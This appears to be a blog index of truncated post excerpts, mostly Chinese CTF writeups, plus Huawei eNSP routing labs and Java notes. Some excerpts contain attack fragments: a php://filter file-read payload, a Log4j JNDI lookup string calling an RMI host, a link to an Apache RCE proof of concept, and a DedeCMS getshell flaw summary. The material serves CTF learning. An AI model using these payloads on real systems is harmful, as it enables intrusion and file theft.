BUUCTF:[WUSTCTF2020]朴实无华 首先在下发现访问有一个假的flag,但是在响应头中找到一个提示,另外还有一个值得注意的是这里是访问得到PHP5中的函数中科学计数法符号无效,只会当作正常字符处理所以这里利用科学计数法的符号就可以绕过level 1level 2直接可参考我的这篇文章:浅谈PHP中哈希比较缺陷问题及哈希强比较相关问题最后直接绕过和即可...
Dest0g3 520迎新赛 Writeup 文章目录WEBphpdestMISCWelcome to fxxking DestCTFPngeniusEasyEncodeStrangeTrafficcodegameWEBphpdestphp源码分析 require_once 绕过不能重复包含文件的限制:https://www.anquanke.com/post/id/213235payload?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/se
2022DASCTF MAY 出题人挑战赛 Writeup 文章目录WEBPower Cookie魔法浏览器getmeMISC不懂PCB的厨师不是好黑客卡比噪音rootme神必流量WEBPower Cookie设置Cookie: admin=1;即可魔法浏览器把源码中的JS拿到Console运行,得到一个UAgetmeApache/2.4.50,去年时间出的Apache 远程代码执行 (CVE-2021-42013)https://github.com/asaotomo/CVE-2021-42013-Apache-RCE-Poc
DedeCMS V5.7 SP1远程任意文件写入漏洞(CVE-2015-4553) 文章目录漏洞原因漏洞影响版本漏洞原理分析漏洞复现漏洞原因uploads/install/index.php中对于全局传参遍历的处理不当造成可进行变量覆盖,进而导致远程文件上传Getshell漏洞影响版本<= Dedecms V5.7 SP1的所有版本漏洞原理分析uploads/install/index.php对于全局传参遍历中的可变变量的写法${$_k}导致变量覆盖,RunMagicQuotes()每个参数的值进行了特殊字符转义处理继续分析uploads/install/i
PHP反序列化构造POP链小练习 一个师傅给的源码,来源不知,就当作小练习记录一下<?phperror_reporting(0);class Vox{ protected $headset; public $sound; public function fun($pulse){ include($pulse); } public function __invoke(){ $this->fun($this->headset); }}.
华为eNSP动态路由OSPF小实验三 R1syssys R1int lo 0ip add 1.1.1.1 32int g0/0/0ip add 12.1.1.1 24quitospf 1 router 1.1.1.1area 1network 12.1.1.0 0.0.0.255network 1.1.1.1 0.0.0.0R2syssys R2int g0/0/0ip add 12.1.1.2 24int s4/0/0ip add 23.1.1.2 24quitospf 1 router 2.2.2.
华为eNSP动态路由OSPF小实验二 R1syssys R1int lo 0 ip add 1.1.1.1 32int g0/0/0ip add 12.1.1.1 24quitospf 1 router 1.1.1.1area 1network 1.1.1.1 0.0.0.0network 12.1.1.0 0.0.0.255R2syssys R2int g0/0/0ip add 12.1.1.2 24int g0/0/1ip add 23.1.1.2 24quitospf 1 router 2.2..
华为eNSP动态路由OSPF小实验一 首先在每个路由器的设置上添加一个Serial的接口添加完之后即可开始配置R1:systemsys R1int g0/0/0ip add 12.1.1.1 24int s4/0/0ip add 13.1.1.1 24int lo 0ip add 1.1.1.1 32quitospf 1 router 1.1.1.1area 0network 12.1.1.0 0.0.0.255network 13.1.1.0 0.0.0.255network 1.1.1.1 0.0.0.0.
第二届网刃杯网络安全大赛 Writeup MISC玩坏的winxpvmdk文件,用DiskGenius打开,找到Administrator用户的桌面的学习资料binwalk分析meiren.png,foremost分离继续binwalk分析,foremost分离f1ag.png分离出来的压缩包需要密码提示QQ有压缩包密码,但是在虚拟磁盘镜像中没有找到有安装过QQ这个软件,猜测可能在线登录过,所以就找唯一安装的浏览器Firefox的本地数据这里几个.db文件都不是.db文件,Navicat无法建立连接,几个.sqlite文
2022DASCTF Apr X FATE 防疫挑战赛 Writeup 文章目录SimpleFlow熟悉的猫冰墩墩废物选手的misc做题记录SimpleFlow首先tcp.stream eq 50中分析传入的执行命令的变量是$s,也就是参数substr($_POST["g479cf6f058cf8"],2)找到对应的参数,然后去掉前面两位字符解码即可cd "/Users/chang/Sites/test";zip -P PaSsZiPWorD flag.zip ../flag.txt;echo [S];pwd;echo [E]得到压缩包密码:PaSsZi
华为eNSP配置RIP综合实验 AR1配置:syssys AR1inter g0/0/0 ip add 172.16.4.2 24inter g0/0/1 ip add 172.16.1.1 24quitripversion 2network 172.16.0.0AR2配置:syssys AR2inter g0/0/0 ip add 172.16.4.3 24inter g0/0/1ip add 172.16.2.1 24quitripversion 2network 172.16.0.0.
AntCTF x D^3CTF MISC部分Writeup 文章目录BadW3terWannaWaccaBadW3ter附件是wav,但是文件头有点问题,对比一下正常的wav即可发现前十六个字节被修改了第一行的内容猜测也是个有用的线索: CUY1nw31lai修改前十六个进制正常的wav文件头然后测试几个常见的wav文件隐写:SilentEye、Deepsound等稍微测试一下发现是DeepSound输入前面的到线索作为密码。得到flag.pngfile识别文件发现flag.png是TIFF文件PS可以选择打开TIFF文件首先有两
BUUCTF:[安洵杯 2019]easy_serialize_php https://buuoj.cn/challenges#[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy_serialize_php访问/index.php?f=highlight_file得到源码 <?php$function = @$_GET['f'];function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'
安装oh-my-zsh报错fatal: gnutls_handshake() failed: Error in the pull function的解决办法 安装oh-my-zsh时报错fatal: unable to access 'https://github.com/ohmyzsh/ohmyzsh.git/': gnutls_handshake() failed: Error in the pull function.Error: git clone of oh-my-zsh repo failed
HGAME 2022 Writeup 文章目录Level - Week1WEBMISC欢迎欢迎!热烈欢迎!这个压缩包有点麻烦好康的流量群青(其实是幽灵东京)CRYPTO新人赛,就没有存题目附件了,简单的记录一下解题过程吧Level - Week1WEBMISC欢迎欢迎!热烈欢迎!hgame{We1com3_t0_HG@ME_2O22}这个压缩包有点麻烦README.txtI don't know if it's a good idea to write down all the passwords.将pa
【MISC】记一次自己以前出的一道题 今天突然翻到的很久以前给一位师傅学校出的校赛题目,想着直接删了太可惜了,就丢在博客这里把Havefun.zip压缩包有密码,弱口令123456直接解压出来happymisc.zip的密码根据提示是:fairytailPS:本人妖尾忠实粉丝^_^解压得到comment.txt很明显是base32,解码发现是zip文件的十六进制字节流的逆序直接用python处理一下转换成zip文件import structa = open("./coment.txt","r")#十六进制数据文件.
2022 RealWorld CTF体验赛Writeup 文章目录Digital Souvenirlog4flagBe-a-Database-Hackerthe Secrets of Memorybaby flaglabFlag ConsoleBe-a-Database-Hacker 2Java Remote DebuggerDigital Souvenirrwctf{RealWorldIsAwesome}log4flag有一些正则过滤网上bypass方法很多,随便找一个就行${${::-j}ndi:${lower:rmi}://vw3nw
黑马程序员Java教程学习笔记(一) 文章目录黑马程序员Java学习笔记Java版本Java语言的跨平台原理JRE和JDKJDK的下载和安装HelloWorld案例注释关键字常量数据类型标识符类型转换运算符字符"+"操作字符串"+"操作复制运算符自增自减运算符关系运算符逻辑运算符三元运算符两只老虎三个和尚黑马程序员Java学习笔记Java版本Java(5.0):是更新力度很大的一个版本,直接让Java的发展进入了快车道Java(8.0):是公司中生产/开发环境使用的最多的版本Java(11.0):是Java学习者使用的最